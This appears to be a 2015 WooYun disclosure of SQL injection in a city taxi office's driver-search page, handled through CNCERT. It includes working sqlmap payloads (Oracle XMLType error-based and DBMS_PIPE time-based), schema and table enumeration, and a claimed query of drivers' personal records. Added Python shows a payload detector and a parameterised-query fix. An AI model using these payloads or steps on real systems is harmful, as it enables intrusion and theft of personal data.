
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0147071

Title: See how I obtained the personal information (name, ID number, mobile number, home address, etc.) of every taxi driver in a certain city

Related vendor: a certain city's taxi administration office

Author: 洞主

Submitted: 2015-10-16 00:38

Fixed: 2015-12-04 16:36

Published: 2015-12-04 16:36

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: handed to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-10-16: details sent to the vendor, awaiting the vendor's handling
2015-10-20: vendor confirmed; details disclosed to the vendor only
2015-10-30: details disclosed to core white hats and experts in the relevant field
2015-11-09: details disclosed to regular white hats
2015-11-19: details disclosed to intern white hats
2015-12-04: details disclosed to the public

Brief description:

Mom no longer has to worry about me not being able to get a taxi.

Detailed description:

Problem URL:
http://**.**.**.**/WebPortal/DriverInfo.aspx?cid=F973F6861D000905
Entering ' in the name search field produces an error.

[screenshot 1.jpg]


Entering ' and '1'=1 renders normally.

[screenshot 2.jpg]


Submitting normal parameters and capturing the request with Burp Suite gives the following:

POST /WebPortal/DriverInfo.aspx?cid=F973F6861D000905 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://**.**.**.**/WebPortal/DriverInfo.aspx?cid=F973F6861D000905
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.3)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: **.**.**.**
Content-Length: 2132
Pragma: no-cache
Cookie: ASP.NET_SessionId=tfbe5un5qvbejnfbrj0i2355; BIGipServerpool_czcweb=4184123584.17695.0000
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTgyNDM4OTMwNA9kFgICAw9kFgoCAQ9kFgQCAQ8WAh4LXyFJdGVtQ291bnQCBxYOZg9kFgJmDxUDFC9XZWJQb3J0YWwvTmV3cy5hc3B4EEFBNjNENTgwOEI4NDYzNDMM6KGM5Lia6LWE6K6vZAIBD2QWAmYPFQMWL1dlYlBvcnRhbC9QdWJsaWMuYXNweBAxODZGRDFDN0MwRjVGQTAzDOS%2FoeaBr%2BWFrOW8gGQCAg9kFgJmDxUDFi9XZWJQb3J0YWwvUG9saWN5LmFzcHgQMzY1ODVFOENDOTgxMDRFNAzmlL%2FnrZbotYTorq9kAgMPZBYCZg8VAxcvV2ViUG9ydGFsL0NvbXBhbnkuYXNweBBFNUYyMUE3RkIzQkRGNkQ1DOS8geS4muS%2FoeaBr2QCBA9kFgJmDxUDHC9XZWJQb3J0YWwvRXhwb3N1cmVMaXN0LmFzcHgQQ0RBRDZDQzI5MjVGQzMwNAzooYzkuJrnm5HnnaNkAgUPZBYCZg8VAyEvV2ViUG9ydGFsL1dvcmtQcm9jZXNzZXNMaXN0LmFzcHgQMjY2Nzk0RUQ3NTc3NjAzMgzmnI3liqHmjIfljZdkAgYPZBYCZg8VAygvV2ViUG9ydGFsL1BvbGl0aWNhbEludGVyYWN0aW9uTGlzdC5hc3B4EEU5NUZDQkREMDJCREIzNTUM5pS%2F5rCR5LqS5YqoZAIDD2QWBAIBD2QWBAIDDw8WBB4EVGV4dAUM5LyB5Lia5L%2Bh5oGvHgtQb3N0QmFja1VybAUsL1dlYlBvcnRhbC9Db21wYW55LmFzcHg%2FbWlkPUU1RjIxQTdGQjNCREY2RDVkZAIHDw8WBB8BBQ%2Fpqb7pqbblkZjkv6Hmga8fAgUvL1dlYlBvcnRhbC9Ecml2ZXJJbmZvLmFzcHg%2FY2lkPUY5NzNGNjg2MUQwMDA5MDVkZAIFDw9kFgIeB29uY2xpY2sFGXRoaXMuZm9ybS50YXJnZXQ9J19ibGFuaydkAgMPZBYCAgEPFgIfAAIEFghmD2QWAmYPFQMXL1dlYlBvcnRhbC9Db21wYW55LmFzcHgQQTc1NkM4NDNEREIzNEVDNAzkvIHkuJrkv6Hmga9kAgEPZBYCZg8VAxcvV2ViUG9ydGFsL0NhckluZm8uYXNweBBCM0QzNUE0MzE2Qjg5RERCDOi9pui%2BhuS%2FoeaBr2QCAg9kFgJmDxUDGi9XZWJQb3J0YWwvRHJpdmVySW5mby5hc3B4EEY5NzNGNjg2MUQwMDA5MDUP6am%2B6am25ZGY5L%2Bh5oGvZAIDD2QWAmYPFQMUL1dlYlBvcnRhbC9OZXdzLmFzcHgQMjMzNDI2QjIxQjZFQUU0OAzkvIHkuJrliqjmgIFkAgUPDxYCHwEFD%2BmpvumptuWRmOS%2FoeaBr2RkAgsPFgIfAAL%2F%2F%2F%2F%2FD2QCDQ8PFgQeC1JlY29yZGNvdW50Zh4QQ3VycmVudFBhZ2VJbmRleAIBZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFE1VDSGVhZGVyMSRidG5TZWFyY2gFCmlidG5TZWFyY2ig6pRqHLsAuX6WFCToA5yx7ue44g%3D%3D&__VIEWSTATEGENERATOR=8AD57CE5&__PREVIOUSPAGE=zULTs4igG4EFeearFv2MiamY3Qlgyn8e1WDGVnSvYvLDp3NInABujMndM12mAmKShhZF-P2VPrwHBDHZfe8bxt7-kAu8aaXRhsfWJJb4chH-JWTR0&__EVENTVALIDATION=%2FwEWCAKdodnEAgKemcGGBgL0sL7KDQLZtY%2FGAwL6iuvMDAK4kLvqAgLRqb%2BCAQKPnrNoO%2F6cSo%2BN7RscJYLcgsS6WewNzT4%3D&UCHeader1%2
4keywords=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%90%9C%E7%B4%A2%E5%85%B3%E9%94%AE%E5%AD%97&txtDriverName=123&ibtnSearch.x=25&ibtnSearch.y=13


Run it through sqlmap;
the database user is DB, and its privilege level is DBA.

C:\Python27\sqlmap1.0\sqlmap>sqlmap.py -r d:\5.txt --current-user --is-dba
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150915}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 23:54:07
d:\5.txt
[23:54:07] [INFO] parsing HTTP request from 'd:\5.txt'
d:\5.txt
[23:54:07] [WARNING] provided value for parameter '__EVENTTARGET' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[23:54:07] [WARNING] provided value for parameter '__EVENTARGUMENT' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[23:54:07] [INFO] resuming back-end DBMS 'oracle'
[23:54:07] [INFO] testing connection to the target URL
[23:54:07] [INFO] heuristically checking if the target is protected by some kind of WAF/IPS/IDS
[23:54:08] [INFO] it appears that the target is not protected
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: txtDriverName (POST)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTgyNDM4OTMwNA
kFgICAw9kFgoCAQ9kFgQCAQ8WAh4LXyFJdGVtQ291bnQCBxYOZg9kFgJmDxUDFC9XZWJQb3J0YWwvTm
3cy5hc3B4EEFBNjNENTgwOEI4NDYzNDMM6KGM5Lia6LWE6K6vZAIBD2QWAmYPFQMWL1dlYlBvcnRhbC
QdWJsaWMuYXNweBAxODZGRDFDN0MwRjVGQTAzDOS/oeaBr+WFrOW8gGQCAg9kFgJmDxUDFi9XZWJQb3
0YWwvUG9saWN5LmFzcHgQMzY1ODVFOENDOTgxMDRFNAzmlL/nrZbotYTorq9kAgMPZBYCZg8VAxcvV2
iUG9ydGFsL0NvbXBhbnkuYXNweBBFNUYyMUE3RkIzQkRGNkQ1DOS8geS4muS/oeaBr2QCBA9kFgJmDx
DHC9XZWJQb3J0YWwvRXhwb3N1cmVMaXN0LmFzcHgQQ0RBRDZDQzI5MjVGQzMwNAzooYzkuJrnm5Hnna
kAgUPZBYCZg8VAyEvV2ViUG9ydGFsL1dvcmtQcm9jZXNzZXNMaXN0LmFzcHgQMjY2Nzk0RUQ3NTc3Nj
zMgzmnI3liqHmjIfljZdkAgYPZBYCZg8VAygvV2ViUG9ydGFsL1BvbGl0aWNhbEludGVyYWN0aW9uTG
zdC5hc3B4EEU5NUZDQkREMDJCREIzNTUM5pS/5rCR5LqS5YqoZAIDD2QWBAIBD2QWBAIDDw8WBB4EVG
4dAUM5LyB5Lia5L+h5oGvHgtQb3N0QmFja1VybAUsL1dlYlBvcnRhbC9Db21wYW55LmFzcHg/bWlkPU
1RjIxQTdGQjNCREY2RDVkZAIHDw8WBB8BBQ/pqb7pqbblkZjkv6Hmga8fAgUvL1dlYlBvcnRhbC9Ecm
2ZXJJbmZvLmFzcHg/Y2lkPUY5NzNGNjg2MUQwMDA5MDVkZAIFDw9kFgIeB29uY2xpY2sFGXRoaXMuZm
ybS50YXJnZXQ9J19ibGFuaydkAgMPZBYCAgEPFgIfAAIEFghmD2QWAmYPFQMXL1dlYlBvcnRhbC9Db2
wYW55LmFzcHgQQTc1NkM4NDNEREIzNEVDNAzkvIHkuJrkv6Hmga9kAgEPZBYCZg8VAxcvV2ViUG9ydG
sL0NhckluZm8uYXNweBBCM0QzNUE0MzE2Qjg5RERCDOi9pui+huS/oeaBr2QCAg9kFgJmDxUDGi9XZW
Qb3J0YWwvRHJpdmVySW5mby5hc3B4EEY5NzNGNjg2MUQwMDA5MDUP6am+6am25ZGY5L+h5oGvZAIDD2
WAmYPFQMUL1dlYlBvcnRhbC9OZXdzLmFzcHgQMjMzNDI2QjIxQjZFQUU0OAzkvIHkuJrliqjmgIFkAg
PDxYCHwEFD+mpvumptuWRmOS/oeaBr2RkAgsPFgIfAAL/////D2QCDQ8PFgQeC1JlY29yZGNvdW50Zh
QQ3VycmVudFBhZ2VJbmRleAIBZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFE1
DSGVhZGVyMSRidG5TZWFyY2gFCmlidG5TZWFyY2ig6pRqHLsAuX6WFCToA5yx7ue44g==&__VIEWSTA
EGENERATOR=8AD57CE5&__PREVIOUSPAGE=zULTs4igG4EFeearFv2MiamY3Qlgyn8e1WDGVnSvYvLD
3NInABujMndM12mAmKShhZF-P2VPrwHBDHZfe8bxt7-kAu8aaXRhsfWJJb4chH-JWTR0&__EVENTVAL
DATION=/wEWCAKdodnEAgKemcGGBgL0sL7KDQLZtY/GAwL6iuvMDAK4kLvqAgLRqb+CAQKPnrNoO/6c
o+N7RscJYLcgsS6WewNzT4=&UCHeader1$keywords=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%90%9C
E7%B4%A2%E5%85%B3%E9%94%AE%E5%AD%97&txtDriverName=123' AND 9063=(SELECT UPPER(X
LType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(106)||CHR(112)||CHR(113)||(SELE
T (CASE WHEN (9063=9063) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(
06)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND 'RaDy'='RaDy&ibtnSearch.x=25&
btnSearch.y=13
Type: AND/OR time-based blind
Title: Oracle OR time-based blind
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTgyNDM4OTMwNA
kFgICAw9kFgoCAQ9kFgQCAQ8WAh4LXyFJdGVtQ291bnQCBxYOZg9kFgJmDxUDFC9XZWJQb3J0YWwvTm
3cy5hc3B4EEFBNjNENTgwOEI4NDYzNDMM6KGM5Lia6LWE6K6vZAIBD2QWAmYPFQMWL1dlYlBvcnRhbC
QdWJsaWMuYXNweBAxODZGRDFDN0MwRjVGQTAzDOS/oeaBr+WFrOW8gGQCAg9kFgJmDxUDFi9XZWJQb3
0YWwvUG9saWN5LmFzcHgQMzY1ODVFOENDOTgxMDRFNAzmlL/nrZbotYTorq9kAgMPZBYCZg8VAxcvV2
iUG9ydGFsL0NvbXBhbnkuYXNweBBFNUYyMUE3RkIzQkRGNkQ1DOS8geS4muS/oeaBr2QCBA9kFgJmDx
DHC9XZWJQb3J0YWwvRXhwb3N1cmVMaXN0LmFzcHgQQ0RBRDZDQzI5MjVGQzMwNAzooYzkuJrnm5Hnna
kAgUPZBYCZg8VAyEvV2ViUG9ydGFsL1dvcmtQcm9jZXNzZXNMaXN0LmFzcHgQMjY2Nzk0RUQ3NTc3Nj
zMgzmnI3liqHmjIfljZdkAgYPZBYCZg8VAygvV2ViUG9ydGFsL1BvbGl0aWNhbEludGVyYWN0aW9uTG
zdC5hc3B4EEU5NUZDQkREMDJCREIzNTUM5pS/5rCR5LqS5YqoZAIDD2QWBAIBD2QWBAIDDw8WBB4EVG
4dAUM5LyB5Lia5L+h5oGvHgtQb3N0QmFja1VybAUsL1dlYlBvcnRhbC9Db21wYW55LmFzcHg/bWlkPU
1RjIxQTdGQjNCREY2RDVkZAIHDw8WBB8BBQ/pqb7pqbblkZjkv6Hmga8fAgUvL1dlYlBvcnRhbC9Ecm
2ZXJJbmZvLmFzcHg/Y2lkPUY5NzNGNjg2MUQwMDA5MDVkZAIFDw9kFgIeB29uY2xpY2sFGXRoaXMuZm
ybS50YXJnZXQ9J19ibGFuaydkAgMPZBYCAgEPFgIfAAIEFghmD2QWAmYPFQMXL1dlYlBvcnRhbC9Db2
wYW55LmFzcHgQQTc1NkM4NDNEREIzNEVDNAzkvIHkuJrkv6Hmga9kAgEPZBYCZg8VAxcvV2ViUG9ydG
sL0NhckluZm8uYXNweBBCM0QzNUE0MzE2Qjg5RERCDOi9pui+huS/oeaBr2QCAg9kFgJmDxUDGi9XZW
Qb3J0YWwvRHJpdmVySW5mby5hc3B4EEY5NzNGNjg2MUQwMDA5MDUP6am+6am25ZGY5L+h5oGvZAIDD2
WAmYPFQMUL1dlYlBvcnRhbC9OZXdzLmFzcHgQMjMzNDI2QjIxQjZFQUU0OAzkvIHkuJrliqjmgIFkAg
PDxYCHwEFD+mpvumptuWRmOS/oeaBr2RkAgsPFgIfAAL/////D2QCDQ8PFgQeC1JlY29yZGNvdW50Zh
QQ3VycmVudFBhZ2VJbmRleAIBZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFE1
DSGVhZGVyMSRidG5TZWFyY2gFCmlidG5TZWFyY2ig6pRqHLsAuX6WFCToA5yx7ue44g==&__VIEWSTA
EGENERATOR=8AD57CE5&__PREVIOUSPAGE=zULTs4igG4EFeearFv2MiamY3Qlgyn8e1WDGVnSvYvLD
3NInABujMndM12mAmKShhZF-P2VPrwHBDHZfe8bxt7-kAu8aaXRhsfWJJb4chH-JWTR0&__EVENTVAL
DATION=/wEWCAKdodnEAgKemcGGBgL0sL7KDQLZtY/GAwL6iuvMDAK4kLvqAgLRqb+CAQKPnrNoO/6c
o+N7RscJYLcgsS6WewNzT4=&UCHeader1$keywords=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%90%9C
E7%B4%A2%E5%85%B3%E9%94%AE%E5%AD%97&txtDriverName=-6174' OR 1375=DBMS_PIPE.RECE
VE_MESSAGE(CHR(108)||CHR(118)||CHR(100)||CHR(115),5) AND 'vvDv'='vvDv&ibtnSearc
.x=25&ibtnSearch.y=13
---
[23:54:08] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Oracle
[23:54:08] [INFO] fetching current user
[23:54:08] [INFO] resumed: DB
current user: 'DB'
[23:54:08] [INFO] testing if current user is DBA
current user is DBA: True
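The sqlmap run above reached the Oracle back end through the txtDriverName field using two payload families it reports by name: error-based via XMLType() and time-based blind via DBMS_PIPE.RECEIVE_MESSAGE(). From the defender's side, both shapes, and the earlier manual probes (a lone ' and the ' and '1'=1 tautology), are recognisable in the decoded POST body. The following Python is an added example (not code from the report or from the affected site) that decodes constructed form bodies for this search form and classifies the txtDriverName value; the __VIEWSTATE value is a placeholder and the sample bodies are constructed to mirror the shapes shown in the report, while a legitimate apostrophe in a name (O'Neil) is included to show the checks do not fire on it.

```python
import re
from urllib.parse import parse_qs

# Constructed sample POST bodies for the DriverInfo.aspx search form (not
# captured traffic). __VIEWSTATE is a placeholder; the txtDriverName values
# mirror the probes and payload shapes the report shows.
SAMPLE_BODIES = [
    # baseline search, as in the Burp capture (txtDriverName=123)
    "__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=VIEWSTATE_PLACEHOLDER"
    "&txtDriverName=123&ibtnSearch.x=25&ibtnSearch.y=13",
    # lone single quote: the probe that made the page throw a database error
    "__VIEWSTATE=VIEWSTATE_PLACEHOLDER&txtDriverName=%27&ibtnSearch.x=25&ibtnSearch.y=13",
    # boolean tautology probe (' and '1'=1) that rendered normally
    "__VIEWSTATE=VIEWSTATE_PLACEHOLDER&txtDriverName=%27+and+%271%27%3D1"
    "&ibtnSearch.x=25&ibtnSearch.y=13",
    # shape of sqlmap's Oracle error-based payload (XMLType with a CHR() chain)
    "__VIEWSTATE=VIEWSTATE_PLACEHOLDER&txtDriverName=123' AND 9063=(SELECT UPPER(XMLType("
    "CHR(60)||CHR(58)||CHR(113)||CHR(107)||(SELECT (CASE WHEN (9063=9063) THEN 1 ELSE 0 END)"
    " FROM DUAL)||CHR(62))) FROM DUAL) AND 'RaDy'='RaDy&ibtnSearch.x=25&ibtnSearch.y=13",
    # shape of sqlmap's Oracle time-based payload (DBMS_PIPE.RECEIVE_MESSAGE)
    "__VIEWSTATE=VIEWSTATE_PLACEHOLDER&txtDriverName=-6174' OR 1375=DBMS_PIPE.RECEIVE_MESSAGE("
    "CHR(108)||CHR(118)||CHR(100)||CHR(115),5) AND 'vvDv'='vvDv&ibtnSearch.x=25&ibtnSearch.y=13",
    # legitimate apostrophe inside a name: must not be flagged
    "__VIEWSTATE=VIEWSTATE_PLACEHOLDER&txtDriverName=O%27Neil&ibtnSearch.x=25&ibtnSearch.y=13",
]

# Signatures for the payload families named in the sqlmap output above.
SIGNATURES = {
    # Oracle error-based: XMLType() forces an ORA error whose text carries data
    "oracle_error_based_xmltype": re.compile(r"\bXMLType\s*\(", re.I),
    # Oracle time-based blind: DBMS_PIPE.RECEIVE_MESSAGE used as a delay primitive
    "oracle_time_based_dbms_pipe": re.compile(r"\bDBMS_PIPE\.RECEIVE_MESSAGE\s*\(", re.I),
    # three or more CHR() calls joined with ||: tool-generated string building
    "chr_concat_chain": re.compile(r"CHR\(\d+\)(?:\s*\|\|\s*CHR\(\d+\)){2,}", re.I),
    # trailing tautology such as ' and '1'=1 or AND 'RaDy'='RaDy (same token on both sides)
    "tautology": re.compile(r"\b(?:and|or)\s+'?(\w+)'?\s*=\s*'?\1(?!\w)", re.I),
}


def driver_name_from_body(body, field="txtDriverName"):
    """Return the decoded value of the search field from a form-encoded body."""
    params = parse_qs(body, keep_blank_values=True)
    return params.get(field, [""])[0]


def classify_value(value):
    """Return the names of the signatures that fire on one decoded field value."""
    hits = []
    # a bare quote is the classic first probe; a quote inside a name is not
    if value.strip() == "'":
        hits.append("lone_quote_probe")
    for name, pattern in SIGNATURES.items():
        if pattern.search(value):
            hits.append(name)
    return hits


def scan_bodies(bodies):
    """Classify every body; each result carries the decoded value and its hits."""
    results = []
    for body in bodies:
        value = driver_name_from_body(body)
        results.append({"value": value, "hits": classify_value(value)})
    return results


if __name__ == "__main__":
    for result in scan_bodies(SAMPLE_BODIES):
        flag = "ALERT" if result["hits"] else "ok   "
        print(f"{flag} txtDriverName={result['value']!r} hits={result['hits']}")
```

The same classification can be applied to IIS request logs or a reverse-proxy capture once the body is available; the point of decoding first is that the tautology probe arrives as %27+and+%271%27%3D1, which a raw-string match would miss.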


Now list the current databases (schemas):

[23:56:03] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Oracle
[23:56:03] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[23:56:03] [INFO] fetching database (schema) names
[23:56:03] [INFO] the SQL query used returns 12 entries
[23:56:03] [INFO] resumed: CYZGDB
[23:56:03] [INFO] resumed: DB
[23:56:03] [INFO] resumed: DBSNMP
[23:56:03] [INFO] resumed: EXFSYS
[23:56:03] [INFO] resumed: OUTLN
[23:56:03] [INFO] resumed: SYS
[23:56:03] [INFO] resumed: SYSMAN
[23:56:03] [INFO] resumed: SYSTEM
[23:56:03] [INFO] resumed: TESTDB
[23:56:03] [INFO] resumed: TPMANAGER
[23:56:03] [INFO] resumed: TSMSYS
[23:56:03] [INFO] resumed: WMSYS
available databases [12]:
[*] CYZGDB
[*] DB
[*] DBSNMP
[*] EXFSYS
[*] OUTLN
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TESTDB
[*] TPMANAGER
[*] TSMSYS
[*] WMSYS


Further enumerating the tables in the CYZGDB schema; there are many tables, so only part of the list is shown.

Database: CYZGDB
[64 tables]
+--------------------------+
| BASEDEPARTMENT |
| BASEEXCEPTION |
| BASEITEMDETAILS |
| BASEITEMS |
| BASELOG |
| BASEMODULE |
| BASEOBJECTPERMISSION |
| BASEPARAM |
| BASEPERMISSION |
| BASEROLE |
| BASESEQ |
| BASEUSER |
| BASEUSERPARAM |
| BASEUSERPROJECT |
| BASEUSERROLE |
| CLIENT_TAXT_NOTICE |
| TABLE_YEAR_SEQID |
| TAXI_APPLYEXAM |
| TAXI_CANCELSTATIS |
| TAXI_CONCOMPANY |
| TAXI_CONPLANCHECK |
| TAXI_CONTEACHERS |
| TAXI_CONTINUESTUDY |
| TAXI_CONTINUESTUDY2 |
| TAXI_COSTFEE |
| TAXI_COURSEID |
| TAXI_DRIVER |
| TAXI_EXAMFEE |
| TAXI_EXAMPLAN |
| TAXI_EXCHAGEEAXM |
| TAXI_EXCHAGETERM |
| TAXI_FAILSCORESTUDENT |
| TAXI_IPRECORD |
| TAXI_LINK |
| TAXI_LOGOUTSTUDENT |
| TAXI_NOTREAINREG |
| TAXI_OUTLINE |
| TAXI_PHOTO |
| TAXI_PLANT |
| TAXI_QUALITYAPPLY |
| TAXI_QUALITYREG |
| TAXI_REGISTRATION |
| TAXI_STUDENTLEARNLIST |
| TAXI_STUDENT_DATE |
| TAXI_STUDYCONDITION |
| TAXI_STUNDENTINFO_IMPORT |
| TAXI_STUNDENTPRINTLOG |
| TAXI_TEACHERINFO |
| TAXI_TRAINREQUEST |
| TAXT_REGQUALITYDATA |
| TAXT_STUNDENTDATA |
| TEMPAPPLYEXAMNOTRAIN |
| TEMPAPPLYEXAMSTULEARN |
| TEMPAPPLYMAKEUPINFO |
| TEMPAUDITINGAPPLYEXAM |
| TEMPAUDITINGEXAMNOTRAIN |
| TEMPAUDITINGEXAMSTULEARN |
| TEMPEXAMPLAN |
| TEMPMAKEUPINFO |
| TEMPNOTRAINSTUINFO |
| TEMPQUALITYAPPLY |
| TEMPREGISTINFO |
| TEMPSTULEARNINFO |
| TEMPTRAINPLANINFO |
+--------------------------+


Querying the contents of the TAXI_DRIVER table:

[screenshot 3.jpg]


The volume of data is very large and only part of it is shown; there are other tables I did not look at, and they hold plenty of content too!

Proof of vulnerability:

Proven!

Fix recommendation:

Parameter filtering!
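The recommendation above is parameter filtering; the form of it that removes the bug class entirely is to stop splicing the search value into the SQL text and pass it as a bound parameter, so that a quote, a tautology or an Oracle function call in txtDriverName is compared as a literal name and never parsed as SQL. The following Python is an added example (not code from the report or from the affected site) that uses an in-memory SQLite table as a stand-in for the Oracle TAXI_DRIVER table (the three columns and all driver records are constructed), and puts the concatenation pattern that produces the behaviour described above beside the parameterised version; the apostrophe name O'Neil shows that filtering quotes away would also break legitimate searches, which the bound parameter handles correctly.

```python
import sqlite3

# Constructed driver records standing in for the TAXI_DRIVER table; every value is fake.
DRIVERS = [
    ("Zhang San", "ID-0001", "138-0000-0001"),
    ("Li Si", "ID-0002", "138-0000-0002"),
    ("O'Neil", "ID-0003", "138-0000-0003"),
]


def build_db():
    """In-memory SQLite database with a minimal TAXI_DRIVER table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE TAXI_DRIVER (NAME TEXT, ID_NUMBER TEXT, PHONE TEXT)")
    conn.executemany("INSERT INTO TAXI_DRIVER VALUES (?, ?, ?)", DRIVERS)
    conn.commit()
    return conn


def search_vulnerable(conn, name):
    """The pattern behind the report: the user's input becomes part of the SQL text."""
    sql = "SELECT NAME, ID_NUMBER, PHONE FROM TAXI_DRIVER WHERE NAME = '" + name + "'"
    return conn.execute(sql).fetchall()


def search_parameterized(conn, name):
    """Fix: the value travels as a bound parameter and cannot alter the statement.
    SQLite binds with ?; an Oracle provider uses a named bind such as :driverName."""
    sql = "SELECT NAME, ID_NUMBER, PHONE FROM TAXI_DRIVER WHERE NAME = ?"
    return conn.execute(sql, (name,)).fetchall()


def raises_db_error(conn, search, name):
    """True if the search throws a database error for this input (the error-page symptom)."""
    try:
        search(conn, name)
    except sqlite3.Error:
        return True
    return False


if __name__ == "__main__":
    conn = build_db()
    for probe in ["Zhang San", "'", "' OR '1'='1", "O'Neil"]:
        if raises_db_error(conn, search_vulnerable, probe):
            vulnerable = "database error"
        else:
            vulnerable = f"{len(search_vulnerable(conn, probe))} row(s)"
        fixed = f"{len(search_parameterized(conn, probe))} row(s)"
        print(f"{probe!r:16} concatenated: {vulnerable:16} parameterised: {fixed}")
```

Under the concatenated version a lone quote produces a database error and the tautology returns every driver, which is the pair of observations the report opens with; under the parameterised version both return no rows and O'Neil is found. In the ASP.NET/Oracle stack the site runs on, the equivalent is adding the value to the command's parameter collection as a bind variable instead of building the string.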

Copyright notice: when republishing, please credit the source 洞主@乌云


Vulnerability responses

Vendor response:

Severity: Medium

Vulnerability Rank: 9

Confirmed: 2015-10-20 16:34

Vendor reply:

CNVD has confirmed and reproduced the described vulnerability; it has been forwarded by CNCERT to its Shaanxi branch center, which will coordinate handling with the website's operating unit.

Latest status:

None yet